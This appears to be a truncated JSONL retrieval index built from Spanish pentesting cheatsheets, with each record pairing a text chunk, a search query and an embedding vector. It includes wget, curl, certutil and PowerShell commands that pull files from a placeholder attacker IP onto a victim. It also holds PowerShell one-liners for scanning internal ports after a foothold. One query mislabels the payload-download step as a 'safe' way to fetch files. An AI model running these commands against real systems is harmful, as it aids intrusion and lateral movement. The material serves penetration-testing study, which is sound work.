-0.05843, -0.04006, -0.03308, 0.04115, -0.05327, 0.01674, -0.05075, -0.13101, -0.05416, -0.00419, -0.04899, -0.15303, 0.17817, -0.10429, 0.04655, -0.00149, -0.07134, 0.1073, -0.074, 0.09276, -0.00625, -0.05466, 0.00527, -0.02906, -0.16408, 0.04695, -0.13089, 0.06572, 0.13839, 0.01849, -0.07355, -0.03234, -0.02635, -0.08871, -0.05864, 0.01068, -0.00663, 0.01827, 0.01441, 0.03259, -0.05767, -0.13756, 0.04914, -0.04838, -0.02545, -0.08229, 0.0103, 0.02928, -0.04558, 0.05338, 0.02152, -0.02718, 0.03357, -1e-05, -0.01099, -0.01981, 0.04406, -0.00427, -0.0719, 0.05642, 0.07705, 0.04672, -0.03444, 0.0453, 0.01952, 0.00492, 0.05045, 0.02625, 0.0402, 0.06213, -0.02914, 0.02404, 0.01128, -0.05832, 0.00432, -0.01441, 0.04465, 0.01154, -0.08665, 0.08409, 0.06483, -0.05152, 0.00321, 0.0407, -0.10911, -0.00206, -0.08795, 0.02326, -0.10912, -0.02393, -0.03028, -0.00898, -0.02729, -0.05198, 0.05348, -0.05719, 0.0134, -0.01729, 0.00476, 0.00844, 0.04409, 0.03238, -0.02167, -0.01718, -0.04076, -0.08999, 0.10094, -0.04077, 0.01527, 0.00892, -0.033, 0.02345, 0.01914, -0.07091, -0.12261, -0.07273, 0.01771, 0.00708, 0.04841, 0.02045, 0.00889, -0.10792, 0.04371, 0.01447, 0.04043, 0.00931, 0.05709, -0.07318, -0.01629, -0.05142, -0.05302, -0.02844, -0.05835, -0.04071, 0.03642, -0.03808, -0.03441, -0.01485, -0.00251, 0.00888, -0.05503, -0.09516, 0.04613, 0.01116, -0.00668, 0.02339, 0.02134, 0.06735, 0.01208, 0.03202, 0.00904, -0.04087, -0.01546, -0.00293, 0.00926, 0.06748, -0.0573, -0.05523, -0.04723, -0.03954, 0.06232, 0.03715, -0.10264, 0.06098, -0.02873, 0.01271, 0.03235, -0.0022, 0.07045, -0.07455, 0.00667, -0.00201, 0.02709, 0.07442, -0.03601, -0.07349, 0.04011, 0.01616, 0.08599, -0.0349, -0.01085, -0.00478, 0.04487, 0.06877, 0.0159, -0.02658, 0.00546, 0.02069, 0.02577, -0.02846, 0.07449, -0.02608, 0.0337, -0.04348, -0.00802, -0.00373, -0.01767, 0.03988, -0.00081, 0.01025, -0.03076, -0.01908, -0.02581, 0.04106, -0.03179, -0.11755, -0.04361, -0.02699, 0.01661, -0.05506, 0.01215, -0.05504]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Recibir en la victima\nwget http://TU_IP/file -O /tmp/file\ncurl http://TU_IP/file -o /tmp/file\ncertutil -urlcache -f http://TU_IP/file file.exe # Windows\npowershell iwr http://TU_IP/file -OutFile file # Windows\n```", "indexar": "cual es una alternativa gratuita y segura para obtener archivos remotos?", "v": [0.07084, 0.00554, -0.13103, -0.07217, 0.05328, 0.00146, 0.00169, -0.05459, -0.17701, -0.03441, -0.10572, -0.18553, 0.16299, 0.04717, 0.16661, -0.02856, 0.07288, 0.07566, 0.05465, 0.0168, 0.06658, -0.09072, -0.02426, -0.04313, -0.09134, -0.11006, 0.0556, 0.10365, -0.03136, 0.01619, 0.12343, 0.009, 0.08326, 0.01685, -0.09149, 0.09838, 0.06072, 0.15977, 0.02699, -0.06679, 0.10219, -0.0113, -0.09028, -0.00606, -0.01639, -0.05525, -0.00696, 0.03642, 0.05295, -0.0677, -0.0708, -0.07911, -0.03803, -0.05537, -0.03247, -0.03584, 0.18503, -0.11488, -0.02822, -0.01701, -0.05143, 0.02386, 0.03503, 0.04838, 0.01877, -0.0782, -0.06042, -0.03712, -0.19891, 0.00752, 0.02453, 0.01007, 0.08278, 0.04306, -0.12714, -0.0001, -0.10392, -0.02852, 0.0266, 0.0542, -0.00125, -0.02002, 0.05533, -0.01504, -0.16405, -0.16097, 0.03312, -0.00336, -0.01814, -0.05178, 0.09621, -0.04828, 0.02088, 0.07226, -0.03821, -0.06423, 0.06708, -0.01508, -0.09205, -0.00445, -0.06105, 0.02663, -0.00989, 0.08316, 0.02262, -0.01242, 0.00888, 0.05448, -0.01178, -0.05921, 0.00243, 0.07357, 0.01924, 0.0419, -0.05948, -0.01971, -0.07152, 0.00038, 0.06584, -0.03017, -0.07189, 0.05852, -0.03896, -0.05481, 0.07387, 0.02452, -0.0027, 0.1029, -0.06956, 0.05937, 0.06858, -0.0275, -0.06727, -0.10549, -0.10929, -0.0497, 0.02316, -0.07554, -0.02241, -0.08079, 0.05754, 0.00941, 0.01513, -0.0238, 0.0909, -0.03086, 0.03415, -0.01702, 0.01647, -0.05451, -0.0865, 0.0151, -0.03243, 0.06313, -0.0354, 0.05346, -0.06594, -0.13961, -0.07919, 0.09426, 0.05058, -0.00417, 0.00253, -0.02509, -0.0367, -0.07055, 0.0464, -0.06074, -0.00332, 0.04821, -0.04838, 0.08828, -0.01175, -0.07337, -0.05939, -0.00051, 0.0007, -0.04974, 0.03392, -0.0816, -0.04558, 0.03062, -0.04464, -0.04356, 0.05656, -0.01564, 0.04749, 0.0419, 0.02502, 0.05931, 0.01015, -0.01696, -0.10188, -0.0089, -0.06979, -0.06355, -0.03802, -0.061, -0.02573, 0.01856, -0.07319, -0.0607, 0.0201, -0.02882, 0.0688, -0.04471, -0.01041, 0.06404, 0.00579, 0.05249, 0.039, -0.02861, 0.09793, -0.05131, -0.01916, -0.04461, -0.00252, -0.03806, 0.00308, 0.01825, -0.0106, -0.01137, 0.0261, 0.01178, 0.01295, 0.06055, 0.03956, 0.06101, -0.01367, -0.04464, 0.01401, 0.02816, 0.00107, 0.00627, 0.0725, 0.01235, 0.00232, -0.05091, -0.00384, -0.02088, -0.0098, 0.09383, -0.0213, -0.01252, -0.05286, -0.06661, -0.10624, 0.03908, -0.01729, -0.03037, -0.0348, 0.05851, 0.03915, 0.05386, 0.02602, -0.01396]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Port scanner en PowerShell\n\n> Escanear puertos **desde la vΓ­ctima Windows sin nmap** (ΓΊtil tras un foothold para mirar la red interna, antes de montar Pivoting ligolo-ng). Usa Operadores PowerShell.", "indexar": "que programa hay en PowerShell para escanear puertos desde una mΓ‘quina Windows?", "v": [0.01608, -0.1261, -0.00094, -0.14238, -0.0681, -0.09003, 0.03314, -0.1831, -0.02363, -0.08713, -0.11743, 0.1218, 0.02536, -0.08331, -0.06083, 0.02495, -0.02965, -0.03392, 0.04999, 0.13526, -0.0702, 0.02989, -0.09745, -0.02155, -0.00699, 0.14155, -0.01198, 0.05484, -0.22064, 0.00465, -0.00259, 0.04918, 0.07006, -0.10496, 0.03057, -0.07302, -0.0191, 0.06433, 0.20124, 0.10654, 0.02721, 0.07857, -0.05017, -0.01136, 0.12737, -0.06155, 0.07671, -0.06328, 0.1247, -0.02939, -0.11289, -0.01427, -0.02041, 0.05932, 0.10367, -0.13552, 0.00281, 0.00809, -0.06846, -0.04051, -0.04942, 0.16224, -0.06123, -0.01353, -0.08001, 0.02137, 0.01509, -0.04523, -0.03708, 0.08648, -0.15008, -0.03714, 0.07164, -0.00795, 0.03655, -0.04787, 0.00486, 0.01474, 0.0634, -0.00243, 0.00758, 0.01333, -0.03831, -0.03377, -0.02314, -0.03029, -0.02907, -0.06106, 0.03268, -0.13351, 0.0549, 0.0031, -0.04138, 0.18307, 0.07558, -0.04953, 0.07538, 0.02222, 0.0213, 0.05347, 0.03819, -0.10299, -0.05386, 0.10284, -0.03383, 0.08833, 0.06115, -0.07314, -0.04175, 0.05049, 0.0406, 0.04723, 0.02479, -0.03556, -0.10278, 0.01961, 0.0092, -0.13273, -0.00979, 0.0173, -0.0637, 0.00173, -0.05761, -0.00917, 0.0489, -0.02848, 0.02228, 0.11614, -0.03152, 0.02698, 0.09138, -0.01476, -0.02979, -0.03316, -0.10164, -0.04565, 0.00708, -0.08488, -0.00874, -0.12332, 0.00139, 0.15131, -0.02311, 0.00865, -0.01181, -0.01894, 0.03921, 0.00078, -0.02796, -0.00112, 0.08595, 0.02571, -0.04836, 0.05158, -0.08603, 0.04435, 0.07467, 0.07474, -0.05989, 0.01127, -0.07025, 0.003, -0.0433, -0.04136, 0.04358, -0.02122, -0.06094, 0.04884, 0.01983, -0.01836, -0.0256, 0.1261, -0.02123, -0.01265, 0.02456, 0.04738, 0.04765, -0.05377, -0.05986, -0.00141, -0.12641, 0.09115, 0.03366, -0.07815, -0.06686, 0.00952, -0.05801, -0.01742, -0.02102, 0.01236, -0.02172, -0.028, 0.01327, -0.07696, 0.01794, 0.00142, -0.03915, 0.03155, 0.0569, -0.03517, -0.06515, 0.01756, -0.03766, -0.01331, 0.07189, 0.09454, -0.042, -0.03515, 0.05194, 0.0601, 0.01643, 0.01306, 0.00073, 0.00016, -0.0353, -0.03973, 0.01925, 0.03532, 0.02549, 0.06434, -0.04511, -0.02203, 0.00128, 0.07653, -0.01906, -0.05612, 0.0024, 0.04515, 0.02621, 0.04062, 0.02705, -0.00173, -0.02018, -0.03813, -0.00858, 0.01005, -0.01123, -0.02555, -0.02554, -0.04552, -0.04124, 0.02123, 0.03762, -0.06586, -0.03125, -0.00695, -0.01733, -0.01606, 0.0061, 0.0038, -0.00673, 0.03097, -0.00647, -0.05738, 0.00649, 0.03188]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Port scanner en PowerShell\n\n> Escanear puertos **desde la vΓ­ctima Windows sin nmap** (ΓΊtil tras un foothold para mirar la red interna, antes de montar Pivoting ligolo-ng). Usa Operadores PowerShell.", "indexar": "cual es una alternativa a nmap que se usa dentro de Windows para revisar puertos?", "v": [0.02597, -0.02788, -0.0789, -0.07611, -0.00125, -0.02757, -0.03044, -0.17344, -0.18367, -0.13636, -0.03223, -0.16874, 0.08229, 0.02828, -0.10495, -0.08449, -0.05277, 0.06344, 0.18751, 0.04205, -0.08911, -0.06846, -0.09359, 0.01079, -0.05114, 0.06766, -0.02797, 0.04507, -0.07041, -0.00129, -0.0072, -0.00971, 0.11173, -0.0698, -0.05974, 0.03917, 0.11284, 0.07236, 0.17971, 0.08594, 0.06535, 0.18519, -0.08351, 0.0534, 0.0758, -0.13047, -0.04277, -0.03209, 0.03177, 0.01486, -0.08644, 0.1096, -0.10834, 0.03327, 0.0459, -0.0259, 0.0658, -0.05629, -0.0456, -0.0155, -0.07822, 0.11948, -0.03092, -0.05011, -0.08527, -0.02405, -0.09175, -0.03339, -0.04419, 0.06817, -0.06649, -0.02946, 0.06993, -0.04759, -0.14328, -0.01255, 0.00751, -0.02858, 0.09888, 0.00173, 0.09026, -0.00493, -0.05339, -0.00753, -0.04882, -0.18691, -0.12607, -0.02048, 0.04415, -0.08235, 0.05458, -0.1014, -0.07138, 0.16853, -0.04908, -0.06315, -0.04745, 0.00646, -0.05061, 0.08949, 0.08431, -0.00605, -0.05587, 0.07282, -0.04066, 0.0324, -0.05704, -0.02341, -0.00931, 0.02435, 0.13893, 0.12866, -0.06101, -0.06677, -0.00935, -0.02785, -0.03374, -0.12288, -0.03997, 0.00718, -0.08007, -0.01696, -0.10091, -0.02963, -0.00304, 0.03056, 0.06546, 0.05921, -0.02306, 0.11878, 0.08301, -0.06686, -0.06694, -0.06679, -0.09951, -0.03022, 0.02766, -0.06393, 0.03774, 0.02085, 0.00152, 0.0698, 0.02116, 0.02004, 0.04753, -0.00762, 0.03541, 0.06043, -0.07003, -0.06173, 0.00117, 0.01998, -0.05425, 0.03225, -0.03541, 0.05472, 0.01302, 0.04681, -0.02564, 0.05526, 0.02149, -0.0127, -0.01703, -0.02327, -0.01823, -0.03637, -0.03058, 0.02795, -0.0053, -0.09609, 0.00304, 0.05319, -0.10291, -0.04185, 0.05397, 0.03461, -0.0036, -0.04643, -0.03708, -0.00201, -0.06534, 0.03699, -0.05579, -0.04707, -0.07704, -0.06411, -0.03989, 0.00639, -0.06296, 0.05668, -0.04047, -0.01069, -0.01885, -0.05954, -0.00847, 0.01601, -0.03585, -0.0327, -0.0262, -0.04828, -0.01253, 0.00904, 0.00424, -0.04026, 0.04795, -0.00155, -0.08858, 0.05265, 0.02408, 0.05745, 0.00761, 0.01466, 0.04011, 0.00251, -0.03616, -0.02929, -0.04393, 0.01962, 0.02731, 0.01989, -0.03431, 0.04671, -0.00384, 0.03202, -0.04166, 0.01892, -0.04663, 0.04616, -0.03333, 0.01349, 0.01679, 0.025, -0.01383, 0.02626, 0.01478, 0.01916, -0.03997, -0.03383, 0.01665, -0.04342, 0.01787, -0.01035, -0.02421, -0.04149, 0.00556, 0.00409, -0.05795, 0.02476, -0.02852, 0.00612, 0.0011, 0.02498, -0.01038, -0.03304, 0.03475, 0.01781]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Con timeout (NO se cuelga)\n```powershell\n1..200 | % { $c=New-Object Net.Sockets.TcpClient; $r=$c.BeginConnect(\"IP\",$_,$null,$null); if($r.AsyncWaitHandle.WaitOne(300) -and $c.Connected){\"Puerto $_ ABIERTO\"}; $c.Close() }\n```", "indexar": "que herramienta sirve para verificar si un puerto estΓ‘ abierto sin que se cuelgue?", "v": [-0.10926, 0.03045, -0.28996, -0.14186, 0.07078, -0.17662, 0.01517, -0.13644, 0.02675, -0.20067, -0.05927, -0.01914, 0.03356, -0.1055, 0.06301, 0.00579, -0.02346, -0.07098, 0.05167, 0.04879, -0.00885, 0.01586, -0.03569, -0.16492, -0.04566, 0.06767, -0.03809, -0.03506, -0.14782, -0.01857, -0.02391, -0.02146, 0.07426, -0.06928, -0.03367, -0.08379, 0.08678, 0.02222, 0.05894, 0.06866, -0.00144, 0.02979, -0.03156, 0.11462, 0.03779, -0.05401, 0.00148, 0.00512, -0.00172, 0.1307, 0.00765, -0.0799, -0.08795, 0.04119, -0.09025, -0.03749, 0.0814, -0.00496, 0.03871, -0.15383, -0.08167, -0.05018, 0.04559, -0.08182, -0.03968, -0.02506, 0.0539, 0.06911, -0.0362, -0.01137, -0.06521, 0.03884, 0.01892, -0.00076, -0.13208, -0.09539, 0.00674, 0.05254, 0.05222, 0.00532, 0.07815, 0.0742, 0.02726, -0.03323, -0.06147, -0.12857, 0.00828, -0.06815, 0.07791, -0.14186, 0.00545, 0.10019, -0.01689, 0.09881, 0.0007, 0.05131, -0.01966, -0.0303, -0.02462, 0.0415, 0.19344, -0.04771, -0.06639, -0.03737, -0.04149, 0.00328, -0.08572, -0.09485, -0.03302, 0.01459, 0.15712, 0.01596, -0.0304, -0.04432, -0.0216, 0.01974, -0.08592, -0.13147, -0.02997, -0.02814, 0.02588, -0.05176, -0.09926, -0.02733, -0.03989, 0.00946, -0.00053, 0.05979, 0.05457, -0.00877, 0.04106, -0.09468, -0.13512, 0.0217, -0.02467, -0.12941, -0.03423, -0.11623, -0.01901, -0.00444, -0.02972, 0.08328, -0.00382, -0.08404, 0.07597, 0.02674, -0.02854, -0.01811, -0.08606, -0.01471, -0.0085, -0.02957, -0.00434, 0.07135, -0.0716, 0.03873, 0.04421, 0.01582, -0.07146, 0.01279, -0.00207, -0.05555, -0.0349, 0.00924, 0.03847, -0.04405, -0.01475, 0.0007, 0.13351, -0.00308, 0.01508, 0.04161, 0.01598, -0.03698, 0.00055, -0.02369, -0.05877, 0.01251, -0.05544, -0.09266, -0.07388, 0.0008, -0.06768, -0.05107, -0.05686, -0.08873, 0.03759, -0.06229, -0.01837, 0.05591, 0.00559, -0.01972, -0.00846, -0.05204, 0.03027, 0.0597, 0.02362, -0.01152, 0.00464, -0.00481, 0.0135, 0.02585, -0.00919, -0.04516, 0.05546, 0.08252, -0.03507, 0.00971, 0.01228, 0.05278, 0.00318, 0.01109, 0.03726, -0.02831, -0.00022, -0.01777, -0.02971, 0.03663, -0.0211, 0.04274, -0.02351, -0.00404, 0.00707, 0.0226, 0.01352, 0.05358, -0.00237, 0.03338, 0.04905, -0.00181, 0.02169, -0.01886, -0.03473, 0.03222, -0.01067, -0.04585, 0.01597, -0.00088, -0.04172, -0.05857, 0.00924, 0.01899, -0.00609, -0.06657, 0.01325, -0.00589, -0.02384, -0.04017, -0.024, -0.06624, -0.06588, 0.03497, 0.04732, -0.05231, 0.04251, 0.00083]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Con timeout (NO se cuelga)\n```powershell\n1..200 | % { $c=New-Object Net.Sockets.TcpClient; $r=$c.BeginConnect(\"IP\",$_,$null,$null); if($r.AsyncWaitHandle.WaitOne(300) -and $c.Connected){\"Puerto $_ ABIERTO\"}; $c.Close() }\n```", "indexar": "con quΓ© puedo probar la conectividad de varios puertos en una lista?", "v": [0.22211, 0.08583, -0.12582, 0.01991, 0.04806, -0.05534, 0.19951, -0.00963, -0.135, -0.17292, -0.09832, 0.0823, 0.06641, -0.02239, -0.04741, -0.01456, 0.06486, -0.03813, 0.05036, -0.01623, 0.03994, -0.05859, -0.14974, -0.05582, 0.07468, 0.02834, 0.08925, 0.02392, -0.0648, 0.03455, -0.09583, 0.00326, 0.11155, 0.03133, 0.0016, -0.04534, 0.06631, 0.10232, 0.13671, 0.01675, 0.07424, 0.02008, -0.05785, -0.04642, 0.05147, -0.05351, -0.08424, -0.04206, 0.00898, -0.0393, -0.08094, 0.05621, -0.1398, 0.02356, -0.05433, -0.04791, 0.01411, 0.03413, 0.06836, -0.05513, -0.04732, 0.06688, -0.01334, -0.02943, -0.01041, -0.02457, -0.05416, 0.04792, -0.14942, 0.0209, 0.00084, 0.05534, -0.02137, 0.02903, 0.01962, 0.0535, 0.04373, -0.00208, 0.02477, 0.07391, 0.0226, -0.03718, -0.03081, -0.028, -0.07511, -0.09472, -0.08589, -0.01426, 0.04927, -0.09609, 0.10899, -0.01456, -0.01834, 0.05557, 0.02685, -0.02123, 0.04431, 0.0688, -0.00264, -0.0248, 0.07923, 0.08492, -0.10378, 0.12417, -0.08065, 0.02497, 0.04883, -0.03816, 0.04164, 0.0038, 0.02521, -0.0115, -0.0255, -0.052, -0.08235, -0.04397, -0.06337, -0.12031, -0.07888, -0.00474, -0.05079, -0.07142, -0.01048, 0.00874, 0.07311, 0.09282, -0.0067, 0.12338, 0.03258, 0.04208, 0.06234, 0.04213, -0.01075, -0.15028, -0.06938, -0.02138, 0.02246, -0.09414, -0.01492, -0.044, -0.01468, 0.05765, -0.0134, -0.00203, 0.00952, 0.00058, -0.02367, 0.02386, -0.1507, 0.04446, -0.03446, 0.03688, -0.03214, 0.05368, -0.04323, 0.03439, 0.12477, -0.05872, 0.02678, 0.05416, -0.03624, 0.0358, -0.05348, 0.02953, 0.06095, -0.01801, -0.04626, -0.01298, 0.06149, 0.03601, -0.03014, 0.12879, -0.09726, -0.08043, -0.01254, 0.0142, -0.03229, -0.05478, -0.02903, -0.05891, -0.04264, 0.07853, -0.04715, -0.09706, -0.02776, -0.03373, -0.04485, -0.08644, 0.05808, 0.11066, -0.00389, 0.05163, -0.01862, 0.05202, 0.02884, -0.0358, 0.02505, -0.00081, -0.00293, -0.03556, 0.00226, 0.0131, 0.01513, -0.04458, 0.06038, 0.055, -0.08907, 0.05365, 0.03911, 0.04294, 0.07424, -0.04325, 0.11398, -0.04116, -0.04509, 0.01622, -0.02047, -0.00855, 0.02089, 0.08623, -0.02206, 0.04327, -0.01855, 0.04804, 0.0478, 0.07307, 0.03686, 0.04265, 0.02671, 0.04309, 0.02607, 0.01817, -0.07551, -0.0924, 0.02034, 0.03864, -0.03361, -0.04486, -0.06137, -0.00216, 0.0145, 0.05577, -0.0511, -0.01958, 0.01299, -0.09103, -0.06355, 0.02817, -0.02909, -0.0876, -0.08467, 0.09691, 0.05839, -0.06401, 0.03139, -0.04649]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Con timeout (NO se cuelga)\n```powershell\n1..200 | % { $c=New-Object Net.Sockets.TcpClient; $r=$c.BeginConnect(\"IP\",$_,$null,$null); if($r.AsyncWaitHandle.WaitOne(300) -and $c.Connected){\"Puerto $_ ABIERTO\"}; $c.Close() }\n```", "indexar": "cΓ³mo hago un escaneo bΓ‘sico de puertos con lΓ­mite de tiempo?", "v": [-0.11266, 0.00239, -0.07104, 0.03746, -0.00296, -0.07228, 0.06058, -0.10432, -0.15318, -0.03668, -0.12357, 0.13336, 0.00127, -0.01735, 0.03269, -0.02731, -0.04127, 0.0272, -0.0285, 0.04701, -0.07896, -0.00557, -0.03446, 0.1146, 0.03078, -0.11045, -0.00695, 0.07653, -0.19091, 0.08988, -0.06165, 0.11574, 0.11707, -0.01908, -0.02252, -0.11114, 0.08834, 0.0225, 0.06398, 0.03724, 0.02133, 0.03675, -0.02922, -0.12363, 0.1014, -0.11095, -0.06406, 0.02811, 0.00947, -0.08268, -0.05676, -0.02638, -0.0832, 0.00705, -0.09885, 0.0403, 0.14313, 0.01104, 0.01019, -0.13021, -0.10403, 0.08965, 0.03518, -0.03134, -0.05471, -0.03975, -0.0263, 0.09316, -0.06013, 0.03981, -0.11104, -0.05044, -0.00341, -0.03122, 0.00062, -0.11456, 0.0065, -0.02711, 0.0737, -0.04511, 0.04528, -0.02533, -0.0958, -0.07735, -0.19212, -0.03106, -0.01997, -0.04564, 0.00678, -0.06083, 0.0479, -0.06488, 0.01634, 0.02407, -0.06641, -0.04536, -0.08503, 0.02467, 0.01145, 0.07844, 0.07733, 0.00674, -0.10514, 0.07567, 0.06673, -0.01378, 0.07032, -0.08224, -0.00099, 0.00666, -0.01738, 0.11606, -0.01331, -0.12738, 0.00587, -0.00307, 0.01322, -0.10424, -0.03683, -0.01166, 0.00014, -0.00813, -0.04132, -0.00237, 0.0851, 0.01363, 0.02846, 0.09439, 0.12581, 0.00228, -0.00501, 0.01852, -0.05737, -0.04298, -0.03626, -0.01889, 0.07181, -0.018, -0.05014, -0.07777, -0.1031, 0.05404, -0.06654, -0.01366, 0.04374, 0.02045, -0.01048, -0.05187, -0.1103, -0.0534, 0.00292, -0.0093, -0.10755, 0.0848, -0.10339, -0.02661, 0.09738, -0.00892, 0.05526, -0.02491, 0.06455, 0.05015, -0.05494, -0.04321, 0.08106, -0.0788, -0.0277, -0.01349, -0.03904, -0.05664, -0.00974, 0.11889, -0.09479, -0.04268, 0.05076, 0.02381, -0.02078, -0.03362, -0.1396, 0.01574, 0.00231, 0.10973, -0.04223, 0.00415, -0.06706, -0.12806, -0.02394, -0.01929, 0.01756, 0.11773, -0.00595, 0.05481, -0.00182, 0.03879, -0.05732, -0.02909, -0.02648, -0.02643, 0.05019, 0.01165, 0.01462, -0.0345, 0.03145, -0.01505, -0.00488, 0.04314, -0.11797, 0.01485, -0.04137, 0.10058, 0.0486, -0.01753, 0.00187, 0.00444, -0.03152, 0.08695, 0.01713, -0.01578, -0.01575, 0.06279, -0.01686, 0.09496, -0.01672, 0.01211, -0.08413, 0.00755, 0.0607, 0.03898, 0.07698, 0.03991, 0.0244, -0.01663, -0.0772, -0.07992, 0.0682, 0.00778, 0.00904, -0.00958, 0.00284, -0.0276, 0.06143, 0.03217, -0.03048, 1e-05, 0.03788, -0.02885, -0.03119, 0.02971, 0.02123, -0.01039, 0.01745, -0.01068, 0.02456, -0.02872, 0.03856, -0.05824]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Solo puertos concretos (instantΓ‘neo)\n```powershell\n53,88,135,139,445 | % { $c=New-Object Net.Sockets.TcpClient; $r=$c.BeginConnect(\"IP\",$_,$null,$null); if($r.AsyncWaitHandle.WaitOne(300) -and $c.Connected){\"$_ ABIERTO\"}; $c.Close() }\n```", "indexar": "con quΓ© puedo comprobar si un puerto estΓ‘ abierto?", "v": [-0.10478, 0.10131, -0.24503, -6e-05, 0.05297, 0.00942, 0.21617, -0.09016, -0.13253, -0.27647, -0.06757, 0.13827, 0.05806, -0.02335, -0.03562, -0.05656, 0.01547, 0.07169, 0.06279, 0.05446, 0.01557, -0.06574, -0.07542, -0.1896, 0.13145, 0.01612, -0.03011, 0.03994, -0.04059, -0.02569, -0.08581, 0.04453, 0.05297, 0.06302, -0.00255, 0.00017, 0.10204, 0.02647, 0.1163, 0.04452, 0.07135, 0.02455, 0.03549, 0.06679, 0.06555, -0.05843, -0.05413, -0.09639, -0.05612, -0.03339, 0.01383, -0.03604, -0.01322, 0.00911, -0.06703, 0.03812, 0.01957, 0.07432, 0.09206, -0.10308, 0.0278, -0.01542, 0.01601, -0.06627, -0.00122, -0.07711, 0.05266, 0.16274, -0.02232, 0.00278, -0.10375, -0.03887, -0.01634, 0.11785, -0.06715, -0.09393, -0.02827, 0.01297, 0.04256, 0.06067, -0.00459, 0.04139, 0.03712, -0.05891, 0.02033, -0.07007, -0.09246, -0.05534, 0.03247, -0.14575, 0.07399, -0.03464, 0.01087, 0.1075, -0.07173, 0.02884, -0.0538, 0.01952, -0.0622, 0.01862, 0.03081, 0.07514, -0.09763, 0.03594, -0.02573, 0.04811, -0.08642, -0.07235, 0.01652, 0.00412, 0.09765, 0.01443, -0.01339, -0.08153, -0.08948, -0.01985, -0.11522, -0.07349, -0.06575, 0.0098, -0.00701, -0.06801, -0.05944, 0.00177, 0.0164, -0.00563, 0.04329, 0.07439, 0.06276, 0.06102, 0.00011, -0.02735, -0.0738, -0.05185, -0.00807, -0.03384, -0.0401, -0.06678, -0.02915, 0.00903, -0.08224, 0.04444, 0.02668, -0.00037, 0.08135, 0.00266, -0.08109, -0.03354, -0.11521, -0.05435, -0.01035, 0.04539, -0.02975, 0.09236, -0.03837, 0.07005, 0.1297, -0.03802, 0.00169, 0.02241, 0.00246, 0.03928, -0.11058, 0.02566, 0.00185, -0.019, -0.06085, -0.00247, 0.04619, -0.03372, -0.0392, 0.06335, -0.04312, -0.05359, 0.02027, -0.00521, -0.03712, -0.00928, -0.06291, -0.07589, -0.07275, 0.03688, -0.03958, -0.06048, -0.03734, -0.05924, 0.03764, -0.07279, 0.01066, 0.08785, 0.01728, 0.02284, -0.01471, -0.01724, 0.01223, 0.04898, -0.00453, 0.01087, -0.03469, -0.02589, -3e-05, 0.03272, 0.01104, -0.04145, 0.02053, 0.04424, -0.05766, 0.08476, -0.01252, 0.05848, 0.01414, -0.00203, 0.07262, -0.03388, -0.03143, 0.04208, -0.05492, 0.02616, 0.00401, 0.02967, -0.02168, 0.06106, 0.03785, 0.00566, 0.03052, 0.03269, 0.01526, 0.01856, 0.07606, 0.06362, 0.00819, 0.01683, -0.04061, 0.00371, -0.00129, 0.02103, -0.01672, 0.01365, -0.03477, -0.02601, 0.03781, 0.01793, -0.02605, -0.0722, 0.04968, -0.02807, -0.05671, 0.02801, -0.02008, -0.05575, -0.11073, 0.07146, 0.02325, -0.07318, 0.00985, -0.00322]} -{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Solo puertos concretos (instantΓ‘neo)\n```powershell\n53,88,135,139,445 | % { $c=New-Object Net.Sockets.TcpClient; $r=$c.BeginConnect(\"IP\",$_,$null,$null); if($r.AsyncWaitHandle.WaitOne(300) -and $c.Connected){\"$_ ABIERTO\"}; $c.Close() }\n```", "indexar": "que herramienta sirve para verificar la disponibilidad de puertos especΓ­ficos?", "v": [0.06681, 0.14946, -0.29959, -0.19146, 0.09527, -0.13329, 0.12854, -0.14108, -0.07387, -0.14561, -0.00868, -0.00238, 0.04282, -0.12747, 0.10087, -0.00535, 0.04214, -0.13301, 0.01972, 0.09162, 0.04798, -0.04978, -0.06218, -0.03913, -0.10229, 0.06607, 0.02121, -0.08729, -0.21288, 0.05766, 0.01636, 0.04844, -0.00888, -0.06221, -0.02634, -0.08116, 0.01482, 0.05279, 0.00596, 0.0288, 0.08187, 0.05382, -0.00058, 0.01732, 0.08867, -0.01078, -0.06703, 0.00493, 0.00395, 0.06562, -0.01719, -0.01869, -0.10289, 0.03146, -0.09081, -0.07377, 0.0984, 0.00565, 0.05301, -0.09578, -0.10249, -0.00873, -0.01874, -0.07469, 0.02829, -0.03026, 0.01227, 0.01184, -0.089, -0.02417, -0.14344, 0.02754, 0.05978, 0.00765, -0.05458, -0.06911, 0.03016, 0.08416, 0.07958, 0.03181, 0.09156, 0.03828, -0.02524, -0.03032, -0.10111, -0.1118, 0.01075, -0.07331, 0.05188, -0.14225, 0.03609, 0.07448, -0.03482, 0.08851, -0.03336, 0.03247, 0.02168, 0.0416, 0.01164, 0.05328, 0.18772, -0.05884, -0.00691, 0.05455, -0.02177, -0.00553, -0.00749, -0.07109, -0.03714, -0.00219, 0.10762, -0.02434, -0.02597, -0.0524, 0.00918, 0.03318, -0.01734, -0.13483, 0.03012, 